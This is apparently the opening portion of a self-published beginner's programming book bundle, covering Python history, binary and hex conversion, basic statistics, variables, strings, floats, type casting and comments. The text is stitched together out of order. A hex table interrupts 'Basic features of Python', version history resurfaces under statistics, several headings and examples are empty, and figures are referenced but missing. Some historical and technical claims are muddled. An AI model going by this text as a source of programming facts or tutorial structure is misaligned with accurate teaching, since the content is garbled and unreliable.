John Cod - Coding Languages - SQL, Linux, Python, Machine Learning. The Step-By-Step Guide For Beginners
LANGUAGES
JOHN S. CODE
© Copyright 2019 - All rights reserved.
The content contained within this book may not be reproduced,
duplicated or transmitted without direct written permission from
the author or the publisher.
Under no circumstances will any blame or legal responsibility be
held against the publisher, or author, for any damages, reparation,
or monetary loss due to the information contained within this book.
Either directly or indirectly.
Legal Notice:
This book is copyright protected. This book is only for personal
use. You cannot amend, distribute, sell, use, quote or paraphrase
any part, or the content within this book, without the consent of the
author or publisher.
Disclaimer Notice:
Please note the information contained within this document is for
educational and entertainment purposes only. All effort has been
executed to present accurate, up to date, and reliable, complete
information. No warranties of any kind are declared or implied.
Readers acknowledge that the author is not engaging in the
rendering of legal, financial, medical or professional advice. The
content within this book has been derived from various sources.
Please consult a licensed professional before attempting any
techniques outlined in this book.
By reading this document, the reader agrees that under no
circumstances is the author responsible for any losses, direct or
indirect, which are incurred as a result of the use of information
contained within this document, including, but not limited to, —
errors, omissions, or inaccuracies.
INTRODUCTION
First of all, I want to congratulate you on purchasing this
bundle on programming languages. This book is aimed at those
who are approaching programming and coding languages for the first
time. It will introduce you to the basics, get you into practice,
and give you important tips and advice on the most popular
programming languages. In these texts you will have the opportunity
to get to know one of the most innovative operating systems, Linux;
manage and organize data with the well-known SQL language; learn to
write code and master it with Python; and analyze big data with
the Machine Learning book, fully entering the world of
computer programming. You no longer need to feel left out at work
for having no idea how to work with computer data; you can gain a
clearer vision and start getting serious about your future. The world is
moving forward with technology, and mastering programming
languages is becoming more and more fundamental at work and for
your future in general. I wish you a good read and good luck on
this new adventure and for your future.
TABLE OF CONTENTS
1.
PYTHON PROGRAMMING FOR BEGINNERS:
A hands-on easy guide for beginners to learn Python programming fast,
coding language, Data analysis with tools and tricks.
John S. Code
2.
PYTHON MACHINE LEARNING:
THE ABSOLUTE BEGINNER’S GUIDE TO UNDERSTANDING NEURAL
NETWORKS, ARTIFICIAL INTELLIGENCE, DEEP LEARNING AND
MASTERING THE FUNDAMENTALS OF ML WITH PYTHON.
John S. Code
3.
LINUX FOR BEGINNERS:
THE PRACTICAL GUIDE TO LEARN LINUX OPERATING SYSTEM
WITH THE PROGRAMMING TOOLS FOR THE INSTALLATION,
CONFIGURATION AND COMMAND LINE + TIPS ABOUT HACKING
AND SECURITY.
John S. Code
4.
SQL COMPUTER PROGRAMMING FOR
BEGINNERS:
LEARN THE BASICS OF SQL PROGRAMMING WITH THIS STEP-BY-
STEP GUIDE IN AN EASY AND COMPREHENSIVE WAY FOR
BEGINNERS, INCLUDING PRACTICAL EXERCISES.
John S. Code
PYTHON PROGRAMMING FOR
BEGINNERS:
A HANDS-ON EASY GUIDE FOR
BEGINNERS TO LEARN PYTHON
PROGRAMMING FAST, CODING
LANGUAGE, DATA ANALYSIS
WITH TOOLS AND TRICKS.
JOHN S. CODE
Table of Contents
Introduction
Chapter 1 Mathematical Concepts
Chapter 2 What Is Python
Chapter 3 Writing The First Python Program
Chapter 4 The Python Operators
Chapter 5 Basic Data Types In Python
Chapter 6 Data Analysis with Python
Chapter 7 Conditional Statements
Chapter 8 Loops – The Never-Ending Cycle
Chapter 9 File handling
Chapter 10 Exception Handling
Chapter 11 Tips and Tricks For Success
Conclusion
Introduction
Python is an excellent choice for machine learning for a few
reasons. First of all, it is a simple language on the surface.
Even if you are not familiar with Python, getting
up to speed is quick if you have ever
used any other language with C-like syntax.
Second, Python has a great community, which results in good
documentation and friendly, thorough answers on Stack
Overflow (essential!).
Third, thanks to that huge community, there are plenty of useful
libraries for Python (both "batteries
included" and third-party), which solve practically any problem
you may have (including machine learning).
History of Python
Python was invented in the later years of the 1980s. Guido van
Rossum, the founder, started using the language in December 1989.
He is Python's only known creator and his integral role in the
growth and development of the language has earned him the
nickname "Benevolent Dictator for Life". It was created to be the
successor to the language known as ABC.
The next version to be released was Python 2.0, in October of
the year 2000. It had significant upgrades and new highlights,
including a cycle-detecting garbage collector and support
for Unicode. Most fortunately, with this particular version
the development process of the language became more
transparent and community-backed.
Python 3.0 initially started its existence as Py3K. This
version was rolled out in December of 2008 after a rigorous
testing period. Unfortunately, this particular version of Python
was not backward compatible with previous versions.
Yet, a significant number of its major features have
been backported to versions 2.6 and 2.7 (Python), and releases
of Python 3 ship with the 2to3 utility, which helps to
automate the translation of Python scripts.
Python 2.7's end-of-life date was originally supposed to be back
in 2015, but it was put off until the year 2020. A major concern
was that existing code could not simply be rolled back but had to
be rolled FORWARD into the new version,
Python 3. In 2017, Google declared that work would be
done on Python 2.7 to enhance its performance under
concurrently running tasks.
Basic features of Python
Python is a distinct and extremely robust programming
language that is object-oriented, almost comparable to Ruby,
Perl, and Java. Some of Python's remarkable highlights:
Binary Hexadecimal
0001 1
0010 2
0011 3
0100 4
0101 5
0110 6
0111 7
1000 8
1001 9
1010 A
1011 B
1100 C
1101 D
1110 E
1111 F
From the table, we can see ( 1001 )2 is ( 9 )16 and ( 0110 )2, the
MSB group, is ( 6 )16.
Therefore, ( 1101001 )2 = ( 01101001 )2 = ( 69 )16
Hexadecimal to binary
We can use the above given table to quickly convert hexadecimal
numbers to binary equivalents. Let’s convert ( 4EA9 )16 to binary.
( 4 )16 = ( 0100 )2
( E )16 = ( 1110 )2
( A )16 = ( 1010 )2
( 9 )16 = ( 1001 )2
So, ( 4EA9 )16 = ( 0100111010101001 )2 = ( 100111010101001 )2
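Both conversions can be checked directly in Python; here is a quick sketch using only built-in functions (int with a base argument, plus hex and bin):

```python
# Binary -> hexadecimal: parse the binary string, then format as hex
n = int("1101001", 2)          # 105 in decimal
print(hex(n))                  # 0x69, matching ( 1101001 )2 = ( 69 )16

# Hexadecimal -> binary: parse the hex string, then format as binary
m = int("4EA9", 16)
print(bin(m))                  # 0b100111010101001, matching the result above
```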
Decimal to Hexadecimal
You can say hexadecimal is an extended version of decimal.
Let’s convert ( 45781 )10 to hexadecimal. But, first, we have to
remember this table.
Decimal Hexadecimal
0 0
1 1
2 2
3 3
4 4
5 5
6 6
7 7
8 8
9 9
10 A
11 B
12 C
13 D
14 E
15 F
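The worked conversion of ( 45781 )10 can be sketched in code. Below is the repeated-division-by-16 method that the table supports, confirmed against Python's built-in hex() function:

```python
# Convert decimal 45781 to hexadecimal by repeated division by 16,
# reading the remainders from last to first.
n = 45781
digits = ""
while n > 0:
    digits = "0123456789ABCDEF"[n % 16] + digits
    n //= 16
print(digits)        # B2D5
print(hex(45781))    # 0xb2d5 - the built-in function agrees
```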
Statistics
Statistics is another important field of mathematics that is crucial
in various computer science applications. Data analysis and machine
learning wouldn’t be what they are without the advancements made in
statistical concepts during the 20th century. Let’s look at some
concepts related to statistics.
Outlier
Outlier detection is very important in statistical analysis. It helps in
homogenizing the sample data. After detecting the outliers, what to
do with them is crucial because they directly affect the analysis
results. There are many possibilities including:
Discarding Outlier
Sometimes it’s better to discard outliers because they have been
recorded due to some error. This usually happens where the
behavior of the system is already known.
System Malfunction
But, outliers can also indicate a system malfunction. It is always
better to investigate the outliers instead of discarding them
straightaway.
Average
Finding the center of a data sample is crucial in statistical analysis
because it reveals a lot of system characteristics. There are different
types of averages, each signifying something important.
Mean
Mean is the most common average. All the data values are added
and divided by the number of data values added together. For
example, you sell shopping bags to a well-renowned grocery store
and they want to know how much each shopping bag can carry.
You completely fill 5 shopping bags with random grocery items
and weigh them. Here are the readings in pounds.
5.5, 6.0, 4.95, 7.1, 5.0
You calculate the mean as (5.5 + 6 + 4.95 + 7.1 + 5) / 5 = 5.71.
You can tell the grocery store your grocery bags hold 5.71 lbs on
average.
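The shopping-bag calculation above can be written as a few lines of Python; a minimal sketch:

```python
# Mean: total weight of the bags divided by the number of bags
weights = [5.5, 6.0, 4.95, 7.1, 5.0]
mean = sum(weights) / len(weights)
print(round(mean, 2))   # 5.71
```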
Median
Median is the center value with respect to the position of data in a
sample data when it’s sorted in ascending order. If sample data has
odd members, the median is the value with an equal number of
values on both flanks. If sample data has an even number of values,
the median is calculated by finding the mean of two values in the
middle with equal number of items on both sides.
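Python's standard statistics module handles both the odd and even cases described above; the sample values below reuse the shopping-bag data and are only illustrative:

```python
import statistics

odd_sample = [5.5, 6.0, 4.95, 7.1, 5.0]   # 5 values: the middle one after sorting
even_sample = [5.5, 6.0, 4.95, 7.1]       # 4 values: mean of the two middle values
print(statistics.median(odd_sample))      # 5.5
print(statistics.median(even_sample))     # (5.5 + 6.0) / 2 = 5.75
```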
Mode
Mode is the most recurring value in a dataset. If there is no
recurring value in the sample data, there is no mode.
Variance
To find how much each data value in a sample data changes with
respect to the average of the sample data, we calculate the variance.
Here is a general formula to calculate variance:
variance = sum of (each data point - mean of sample)² / number of
data points in the sample
If the variance of a sample is low, the data values cluster closely
around the mean, which usually means there are no extreme outliers
in the data.
Standard Deviation
We take the square root of the variance to find the standard
deviation. It expresses the spread of the sample data in the same
units as the data itself.
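The variance formula and the standard deviation can be sketched with the statistics module; pvariance divides by the number of points, matching the formula given above (the data reuses the shopping-bag weights):

```python
import statistics

weights = [5.5, 6.0, 4.95, 7.1, 5.0]
# pvariance divides by the number of points, as in the formula above
variance = statistics.pvariance(weights)
std_dev = statistics.pstdev(weights)      # square root of the variance
print(round(variance, 4))                 # 0.6284
print(round(std_dev, 4))                  # 0.7927
```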
Probability
No one can accurately tell what will happen in the future. We can
only predict what is going to happen with some degree of certainty.
The probability of an event is written mathematically as,
Probability = number of possible ways an event can happen / total
number of possibilities
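As a tiny worked example of the formula, here is the probability of rolling an even number on a fair six-sided die:

```python
# 3 favourable outcomes (2, 4, 6) out of 6 equally likely possibilities
favourable = 3
total = 6
probability = favourable / total
print(probability)    # 0.5
```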
A few points:
• Python 1.0
After the last update to Python 0.9.0, a new version, Python 1.0,
was released in January of the following year. 1994 marked the
addition of key new features to the Python programming language.
Functional programming tools such as map, reduce, filter, and
lambda were part of the new features of the version 1 release. Van
Rossum mentioned that the obtainment of map, lambda, reduce and
filter was made possible by a LISP hacker who missed them and
submitted patches that worked. Van Rossum's contract with CWI
came to an end with the release of the first update version 1.2 on
the 10th of April, 1995. In the same year, Van Rossum went on to
join CNRI (Corporation for National Research Initiatives) in
Reston, Virginia, United States, where he continued to work on
Python and published different version updates.
Nearly six months following the first version update, version 1.3
was released on the 12th of October, 1995. The third update,
version 1.4, came almost a year later in October of 1996. By then,
Python had developed numerous added features. Some of the
typical new features included an inbuilt support system for
complex numbers and keyword arguments which, although
inspired by Modula-3, shared a bit of a likeness to the keyword
arguments of Common Lisp. Another included feature was a
simple form of data hiding through name mangling, although it could
be easily bypassed.
It was during his days at CNRI that Van Rossum began the CP4E
(Computer Programming for Everybody) program which was
aimed at making more people get easy access to programming by
engaging people in simple programming-language literacy. Python was
a pivotal element in van Rossum's campaign, and owing to its
concentration on clean syntax, Python was already a
suitable programming language. Also, since the goals of ABC and
CP4E were quite similar, there was no hassle putting Python to use.
The program was pitched to and funded by DARPA, although it
did become inactive in 2007 after running for eight years.
However, Python still tries to be relatively easy to learn by not
being too arcane in its semantics and syntax, although reaching
out to non-programmers is no longer a priority.
The year 2000 marked another significant step in the development
of Python when the python core development team switched to a
new platform — BeOpen where a new group, BeOpen PythonLabs
team was formed. At the request of CNRI, version 1.6 was released
on the 5th of September 2000, succeeding Python 1.5, which had been
released in December 1997. This update marked the end of the
language's development at CNRI, because the development team left
shortly afterward. The change affected the release timelines of the
new version Python 2.0 and the version 1.6 update, causing them to
clash. It was only a question of time before Van Rossum and his
crew of PythonLabs developers switched to Digital Creations, with
Python 2.0 being the only version ever released by BeOpen.
With the version 1.6 release caught between a switch of platforms,
it didn't take long for CNRI to include a license in the version
release of Python 1.6. The license contained in the release was
quite more prolonged than the previously used CWI license, and it
featured a clause mentioning that the license was under the
protection of the laws applicable to the State of Virginia. This
intervention sparked a legal feud which drew The Free Software
Foundation into a debate regarding the "choice-of-law" clause
being incompatible with that of the GNU General Public License. At
this point, negotiations began between the FSF, CNRI, and
BeOpen on changing Python to a free software license
which would make it compatible with the GPL. The
negotiation process resulted in the release of another version update
under the name Python 1.6.1. This new version was no different
from its predecessor aside from a few bug fixes and the
newly added GPL-compatible license.
• Python 2.0:
After the legal drama surrounding the release of Python 1.6,
which culminated in an unplanned update (version 1.6.1), Python
was keen to put it all behind and forge ahead. So, in October of
2000, Python 2.0 was released. The new release featured additions
such as list comprehensions, which were borrowed from the
functional programming languages Haskell and SETL. The syntax of
this latest version was akin to that found in Haskell, but differed
in that Haskell used punctuation characters while Python stuck to
alphabetic keywords.
Python 2.0 also featured a garbage collection system which was
able to collect reference cycles. A version update (Python
2.1) quickly followed the release of Python 2.0, much as Python
1.6.1 had followed 1.6. However, due to the legal issue over
licensing, Python
renamed the license on the new release to Python Software
Foundation License. As such, every new specification, code or
documentation added from the release of version update 2.1 was
owned and protected by the PSF (Python Software Foundation)
which was a nonprofit organization created in the year 2001. The
organization was designed similarly to the Apache Software
Foundation. The release of version 2.1 came with changes to
the language specification, allowing support for nested scopes
like other statically scoped languages. However, this feature was
not enabled by default, and not required, until the release of the
next update, version 2.2, on the 21st of December, 2001.
Python 2.2 came with a significant innovation of its own in the
form of a unification of all Python's types and classes. The
unification process merged the types coded in C and the classes
coded in Python into a single hierarchy, making Python's object
model purely and consistently object-oriented. Another significant
innovation was the addition of generators, as inspired by Icon.
Two years after the release of
version 2.2, version 2.3 was published in July of 2003. It was
nearly another two years before version 2.4 was released on the
30th of November in 2004. Version 2.5 came less than a year after
Python 2.4, in September of 2006. This version introduced the
"with" statement, which encloses a code block within a context
manager; for example, acquiring a lock before the code block runs
and releasing it afterward, or opening and then closing a file. The
construct makes for behavior similar to RAII (Resource Acquisition
Is Initialization) and replaces the typical "try"/"finally" idiom.
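The contrast just described, try/finally versus the "with" statement, can be sketched as follows; the filename notes.txt is only an illustration:

```python
# Without a context manager: the try/finally idiom
f = open("notes.txt", "w")
try:
    f.write("Hello")
finally:
    f.close()          # we must remember to release the resource ourselves

# With a context manager: the file is closed automatically,
# even if an exception occurs inside the block
with open("notes.txt", "w") as f:
    f.write("Hello")
```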
The release of version 2.6 on the 1st of October, 2008 was
strategically scheduled to coincide with the release of
Python 3.0. Aside from the proximity in release date, version 2.6
also had new features like the "warnings" mode, which flagged
the use of elements that had been omitted from Python 3.0.
Subsequently, in July of 2010, another update was released in the
form of Python 2.7. The new version shared features and coincided
in release with version 3.1, the first version update of Python 3.
At this time, Python drew an end to the parallel releases of the
2.x and 3.x lines, making Python 2.7 the last version of the 2.x
series. In November 2014, it was publicly announced that support
for Python 2.7 would stretch until 2020; however, users were
advised to switch to Python 3 at their earliest convenience.
• Python 3.0:
The fourth generation of Python, Python 3.0, otherwise known as
Py3K or Python 3000, was published on the 3rd of December
2008. This version was designed to fix fundamental flaws in the
design of the language. A new major version number had to be made
to implement the required changes, which could not be made while
keeping full compatibility with the 2.x series. The guiding rule
for the creation of Python 3 was to limit the duplication of
features by taking out old ways of doing things. Otherwise, Python
3 still followed the philosophy with which the previous versions
were made. As Python had evolved to accumulate new but redundant
ways of programming alike tasks, Python 3.0 was emphatically
targeted at removing duplicative modules and constructs, in keeping
with the philosophy of having one "and preferably only one"
obvious way of doing things. Regardless of these changes, though,
version 3.0 remained a multi-paradigm language, even though it
didn't share compatibility with its predecessor.
The lack of compatibility meant Python 2.0 code could not be run
on Python 3.0 without proper modification. The dynamic typing used
in Python, as well as the intention to change the semantics of
specific methods of dictionaries, for instance, made a perfect
mechanical conversion from the 2.x series to version 3.0 very
challenging. A tool named 2to3 was created to handle the parts of
the translation that could be done automatically. It carried out
its tasks quite successfully, even though an early review stated
that the tool was incapable of handling certain aspects of the
conversion process. Following the release of version 3.0, projects
that required compatibility with both the 2.x and 3.x series were
advised to keep a single code base for the 2.x series; releases for
the 3.x platform, on the other hand, were to be produced via the
2to3 tool.
For a long time, maintaining Python 3.0 code directly was
discouraged, because the code was required to run on the 2.x
series. This is no longer necessary: since 2012, the recommended
method has been to create a single code base which can run under
both the 2.x and 3.x series through compatibility modules.
Between December 2008 and July 2019, eight version updates were
published in the Python 3.x series; the current version as of the
8th of July 2019 is Python 3.7.4. Within this timeframe, many
updates have been made to the programming language, including the
addition of the new features mentioned below:
The image below shows what appears when you press ‘enter’.
You may opt to use a Python shell through idle. If you do, this is
how it would appear:
In the Python 3.5.2 version, the text colors are: function
(purple), string (green) and result (blue). The string is composed
of the words inside the brackets ("Welcome to My Corner"), while
the function is the command word outside the brackets (print).
Take note that the image above is from the Python 2.7.12 version.
You have to use indentation for your Python statements/codes. The
standard Python code uses four spaces. The indentations are used in
place of braces or blocks.
In some programming languages, you usually place a semi-colon at
the end of each command; in Python, you don’t need to add a semi-
colon at the end of a statement.
In Python, semi-colons are instead used to separate multiple
statements written on the same line.
For version 3, click on your downloaded Python program and save
the file on your computer. Then click on IDLE (Integrated
Development Environment), and your shell will appear. You can now
start using Python. It’s preferable to use IDLE, so that your
code can be interpreted directly by IDLE.
Alternative method to open a shell (for some versions).
An alternative method to use your Python is to open a shell through
the following steps:
Step #1– Open your menu.
After downloading and saving your Python program in your
computer, open your menu and find your saved Python file. You
may find it in the downloaded files of your computer or in the files
where you saved it.
Step #2–Access your Python file.
Open your saved Python file (Python 27) by double clicking it. The
contents of Python 27 will appear. Instead of clicking on Python
directly (as shown above), click on Lib instead.
The difference between the three ‘idle’ menu entries is that the
first two ‘idle’ commands open the black box (shell) too, while
the last ‘idle’ has only the white box (shell). I prefer the third
‘idle’ because it’s easy to use.
1. Start IDLE
2. Navigate to the File menu and click New Window
3. Type the following: print (“Hello World!”)
4. On the File menu, click Save. Type the name
myProgram1.py
5. Navigate to Run and click Run Module to run the
program.
The first program that we have written is known as “Hello
World!” and is used not only to provide an introduction to a new
computer coding language but also to test the basic configuration
of the IDE. The output of the program is “Hello World!”. Here is
what has happened: print() is an inbuilt function, prewritten and
preloaded for you, that is used to display whatever is contained
in the parentheses, as long as it is between the quotes. The
computer will display anything written within the quotes.
Practice Exercise: Now write and run the following python
programs:
✓ print(“I am now a Python Language Coder!”)
✓ print(“This is my second simple program!”)
✓ print(“I love the simplicity of Python”)
✓ print(“I will display whatever is here in quotes such as
owyhen2589gdbnz082”)
Now we need to write a program with numbers but before writing
such a program we need to learn something about Variables and
Types.
Remember, Python is object-oriented and it is not statically typed,
which means we do not need to declare variables before using them
or specify their type. Let us explain this statement. An object-
oriented language simply means that the language supports viewing
and manipulating real-life scenarios as groups with subgroups that
can be linked and shared, mimicking the natural order and
interaction of things. Not all programming languages are object-
oriented; for instance, the C programming language is not
object-oriented. In programming, declaring variables means that we
explicitly state the nature of the variable. A variable can be
declared as an integer, long integer, short integer, floating-point
number, string, or character, including whether it is accessible
locally or globally. A variable is a storage location that takes
different values depending on conditions.
For instance, number1 can take any number from 0 to infinity.
However, if we explicitly specify int number1, it means
that the storage location will only accept integers and not,
for instance, fractions. Fortunately or unfortunately, Python does
not require us to explicitly state the nature of the storage
location (declare variables), as that is left to the Python
language itself to figure out.
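A minimal sketch of this dynamic typing, using the built-in type() function to show that the same name can hold values of different types:

```python
# No declaration needed: Python infers the type from the value,
# and the same name can later hold a value of a different type.
number1 = 42
print(type(number1))      # <class 'int'>
number1 = 3.14
print(type(number1))      # <class 'float'>
number1 = "forty-two"
print(type(number1))      # <class 'str'>
```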
Before tackling types of variables and rules of writing variables, let
us run a simple program to understand what variables when coding
a python program are.
✓ Start IDLE
✓ Navigate to the File menu and click New Window
✓ Type the following:
num1=4
num2=5
sum=num1+num2
print(sum)
✓ On the File menu, click Save. Type the name
myProgram2.py
✓ Navigate to Run and click Run Module to run the program.
The expected output of this program should be “9” without the
double quotes.
Discussion
At this point, you are eager to understand what has just happened
and why the print(sum) does not have double quotes like the first
programs we wrote. Here is the explanation.
The first line num1=4 means that variable num1 (our shortened way
of writing number1, the first number) has been assigned 4 before
the program runs.
The second line num2=5 means that variable num2 (our shortened
way of writing number2, the second number) has been assigned 5
before the program runs.
The computer interprets these instructions and stores the numbers
given.
The third line sum=num1+num2 tells the computer to take
whatever num1 has been given and add it to whatever num2 has been
given. In other terms, sum the values of num1 and num2.
The fourth line print(sum) means: display whatever sum holds. If
we put double quotes around sum, the computer will simply display
the word sum and not the sum of the two numbers! Remember the
cliché that computers are garbage in, garbage out. They follow
what you give them!
Note: + is an operator for summing variables and has other uses.
Now let us try out three exercises involving numbers before we
explain types of variables and rules of writing variables so that you
get more freedom to play with variables. Remember variables
values vary for instance num1 can take 3, 8, 1562, 1.
Follow the steps of opening Python IDE and do the following:
✓ The output should be 54
num1=43
num2=11
sum=num1+num2
print(sum)
✓ The output should be 167
num1=101
num2=66
sum=num1+num2
print(sum)
✓ The output should be 28
num1=9
num2=19
sum=num1+num2
print(sum)
1. Variables
We have used num1, num2, and sum, and the variable names were
not just random; they must follow certain rules and conventions.
Rules are what we cannot violate, while conventions are more like
the recommended way. Let us start with the rules:
The Rules for Naming Variables in Python
Practice Exercise
Write/suggest five variables for:
✓ Hospital department.
✓ Bank.
✓ Media House.
Given scri=75, scr4=9, sscr2=13, Scr=18
✓ The variable names above are supposed to represent the
scores of students. Rewrite the variables to satisfy Python variable
rules and conventions.
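For reference, the standard Python identifier rules are: a variable name must start with a letter or an underscore, may contain only letters, digits, and underscores, is case-sensitive, and cannot be a reserved keyword. A short sketch (the names are only illustrations):

```python
# Valid names
score1 = 75
_total = 18
student_score = 13

# Case matters: scr and Scr are two different variables
scr = 9
Scr = 18
print(scr, Scr)      # 9 18

# Invalid names (each would raise a SyntaxError if uncommented):
# 4scr = 9           # cannot start with a digit
# class = 5          # cannot use a reserved keyword
```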
total=2+9+3+6+8+2+5+1+14+5+21+26+4+7+13+31+24
count=13+1+56+3+7+9+5+12+54+4+7+45+71+4+8+5
Semicolons are also used when writing multiple statements on a
single line. Assume we have to assign and display the ages of four
employees in a Python program. The assignments could be written as:
employee1=25; employee2=45; employee3=32; employee4=43
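As a runnable sketch of the line above:

```python
# Four assignments written as one line, separated by semicolons
employee1 = 25; employee2 = 45; employee3 = 32; employee4 = 43
print(employee1, employee2, employee3, employee4)   # 25 45 32 43
```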
6. Indentation in Python
Indentation is used to group program lines into a block in
Python. The amount of indentation to use is up to the programmer;
however, it is important to ensure consistency. By convention,
four whitespaces are used for indentation instead of tabs. For
example:
Note: We will explain what kind of program this is later.
Indentation in Python also helps make the program look neat and
clean, and it creates consistency. However, when performing line
continuation, indentation can be ignored. Incorrect indentation
will create an indentation error, because in Python indentation
defines the blocks themselves; a program whose blocks are indented
inconsistently will either fail to run or be hard to read.
7. Comments in Python
When writing Python programs, and indeed in any programming
language, comments are very important. Comments are used to
describe what is happening within a program. It becomes easier for
another person looking at a program to get an idea of what
the program does by reading the comments in it. Comments are
also useful to the programmer, as one can forget the critical
details of a program one has written. The hash (#) symbol is used
before writing a comment in Python. The comment extends up to the
newline character. The Python interpreter normally ignores
comments; they are meant for programmers to understand the
program better.
Example
Start IDLE
Navigate to the File menu and click New Window
Type the following:
#This is my first comment
#The program will print Hello World
print('Hello World') #print() is an inbuilt function to
display output
Multi-Line Comments
Just like multi-line program statements we also have multi-line
comments. There are several ways of writing multi-line comments.
The first approach is to type the hash (#) at each comment line
starting point.
For Example
Start IDLE.
Navigate to the File menu and click New Window.
Type the following:
#I am going to write a long comment line
#the comment will spill over to this line
#and finally end here.
The second way of writing multi-line comments involves using
triple single or double quotes: ''' or """. In Python, triple
quotes are used for multi-line strings and multi-line comments.
Caution: when such a string sits right after a function or class
definition it becomes a docstring and is kept in the compiled
code, but we do not have to worry about this at this instance.
Example:
Start IDLE.
Navigate to the File menu and click New Window.
Type the following:
"""This is also a great
illustration of
a multi-line comment in Python"""
Summary
Variables are storage locations that a user specifies before
writing and running a Python program. Variable names are labels
for those storage locations. A variable holds a value depending on
circumstances. For instance, doctor1 can be Daniel, Brenda, or
Rita; patient1 can be Luke, William, or Kelly. Variable names are written
by adhering to rules and conventions. Rules are a must while
conventions are optional but recommended as they help write
readable variable names. When writing a program, you should
assume that another person will examine or run it without your
input and thus should be well written. In programming, declaring
variables means that we explicitly state the nature of the variable.
The variable can be declared as an integer, long integer, short
integer, floating integer, a string, or as a character including if it is
accessible locally or globally. A variable is a storage location that
changes values depending on conditions. Use descriptive names
when writing your variables.
The Python Operators
1. webServerOpen = True
2. lockdownState = False
3. underMaintenance = False
If you are unsure about the data type of a variable, Python allows
you to easily access the data type using the type() function.
If you run the following code next,
1. print(type(webServerOpen))
2. print(type(lockdownState))
You will get the following output:
<class 'bool'>
<class 'bool'>
The function returns the data type of the variable which is sent
inside its parentheses. The values inside the parentheses are called
arguments. Here, ‘bool’ represents a Boolean variable.
Strings
Remember, in our first program, we printed "Hello World!". We called it a phrase or text, which is not built into Python but can be used to convey messages to the user. This text and similar phrases are called strings in programming languages.
Strings are nothing more than a series of characters. Whenever you
see something enclosed with double quotation marks or single
quotation marks, the text inside is considered a string.
For example, the variables that I've just declared below are all strings and perfectly valid. Note the extra " " strings concatenated in between; without them the three names would run together with no spaces.
1. firstName = "John"
2. middleName = "Adam"
3. lastName = "Doe"
4. fullName = firstName + " " + middleName + " " + lastName
5. print(fullName)
What's the output? John Adam Doe
If you want to run some other methods on the output, feel free.
Here's a program which runs some tests on the variables:
firstName = "John"
middleName = "Adam"
lastName = "Doe"
fullName = firstName + " " + middleName + " " + lastName
print(fullName.lower())
message = "The manager, " + fullName.title() + ", is a good person."
print(message)
What would be the output? For the first print statement:
john adam doe – All lowercase letters. For the second print statement:
The manager, John Adam Doe, is a good person. – Concatenated a string on which a method was applied.
So, you can use these methods on every string in your program and
it will output just fine.
Adding Whitespaces:
Whitespaces refer to the characters which are used to produce
spacing in between words, characters, or sentences using tabs,
spaces, and line breaks. It's better to use whitespace properly so the output is readable for users.
To produce whitespaces using tabs, use this combination of
characters ‘\t’. Here’s an example to show you the difference with
and without the tab spacing.
a = 2424
b = 10101
c = 9040
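Using the values above, a small sketch of the difference with and without tab spacing (the labels are made up for illustration):

```python
a = 2424
b = 10101
c = 9040

# Without tabs, labels and values are separated by single spaces
plain = "a: " + str(a) + " b: " + str(b) + " c: " + str(c)
print(plain)

# With '\t', each value is pushed out to the next tab stop
tabbed = "a:\t" + str(a) + "\tb:\t" + str(b) + "\tc:\t" + str(c)
print(tabbed)
```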
Floats
If you declare a number with a decimal point, Python will
automatically consider it a floating-point number or a float.
All operations you can perform on integers can also be performed on floating-point numbers. If you run the type() function on floats, you'll get the type 'float'.
Here’s a program to show some operations on floats:
w = 1.2 * 0.3
print(w)
x = 10.4 + 1.6
print(x)
y = 10.555 + 22.224
print(y)
z = 0.004 + 0.006
print(z)
Here is the output to all four print statements:
0.36
12.0
32.778999999999996
0.01
Type Casting: What Is It?
Another fact about Python is that it is a dynamically-typed
language.
A dynamically-typed language doesn't associate a data type with your variable at the time you are typing your code. Rather, the type is associated with the variable at run-time. Not clear? Let's see an example.
x = 10
x = "I am just a phrase"
x = 10.444
x = True
When you run this code, it’ll perform its desired actions correctly.
Let’s see what happens with the variable ‘x’ though. We’ve written
four statements and assigned different values to ‘x’.
On run-time (when you interpret or run your program), on line 1,
‘x’ is an integer. On line 2, it’s a string. On line 3, it’s a float, and
finally, it’s a Boolean value.
However, through typecasting, we can manually change the types
of each variable. The functions we’ll be using for that purpose are
str(), int(), and float().
Let’s expand the same example:
x = 10
x = float(x)
print(type(x))
x = "I am just a phrase"
print("x: " + x)
print(type(x))
x = 10.444
x = int(x)
print(type(x))
x = False
x = int(x)
print(x)
In this program, we've used everything covered in the last few lessons: all the data types, converted using our newly learned functions.
In the first case, x is converted into a float and the type function
does verify that for us. Secondly, the string is still a string since it
can’t be converted into numbers, int or float. Thirdly, we convert
the float into an integer.
As an added exercise, if you print the newly changed value of the
third case, you’ll see that the value of x is: 10. This is because the
type is now changed and the values after the decimal point are
discarded.
In the fourth case, we print the value of x which is False. Then, we
change its value to an integer. Here, something else comes up. The
output? 0.
It's because, in Python, True converts to the integer 1 and False converts to 0 (and, going the other way, any non-zero number counts as true while 0 counts as false). So their integer conversions yield 1 and 0 for True and False respectively.
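A quick sketch of the Boolean conversions just described:

```python
# True and False convert to the integers 1 and 0
print(int(True))    # prints: 1
print(int(False))   # prints: 0

# Going the other way, non-zero numbers are truthy and 0 is falsy
print(bool(5))      # prints: True
print(bool(0))      # prints: False
```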
Comments
Comments are text phrases that are put in the code to make it
understandable and readable for other coders, readers, and
programmers.
Why Are Comments Important?
Comments are very important, especially when you’re working
with other programmers and they’ll be reviewing your code sooner
or later. Through comments, you can write a small description of
the code and tell them what it does.
Also, if you have other details or personal messages which are
relevant to the code, you can put them there, since the interpreter
doesn’t catch them.
How to Write Comments?
In Python, there are two ways to write comments, and we'll be
exploring both of them. For our first method, you can use the “#”
symbol in front of the line you wish to comment. Here, take a look
at this code:
# This line is a comment
# Count is a simple variable
count = 15
print(count)
If you run this code, the output will be 15. This is because the comment lines (starting with #) are not run at all.
Now, this method is fine if your comments are short, i.e., do not span multiple lines. But if they do, hashing all of them is a waste of time. For our second method, we'll open our commented lines with three single quotation marks (''') and close them with three quotation marks as well. Here's an example:
1. '''
2. This comment spans
3. on multiple lines.
4. '''
5. count = 15
6. print(count)
Notice, we have to close our multi-line comment, unlike the single
line comment.
Data Analysis with Python
Another topic that we need to explore a bit here is how Python, and
some of the libraries that come with it, can work with the process
of data analysis. This is an important process for any businesses
because it allows them to take all of the data and information they
have been collecting for a long time, and then can put it to good use
once they understand what has been said within the information. It
can be hard for a person to go through all of this information and
figure out what is there, but for a data analyst who is able to use
Python to complete the process, it is easy to find the information
and the trends that you need.
The first thing that we need to look at here though is what data
analysis is all about. Data analysis is going to be the process that
companies can use in order to extract out useful, relevant, and even
meaningful information from the data they collect, in a manner that
is systematic. This ensures that they are able to get the full
information out of everything and see some great results in the
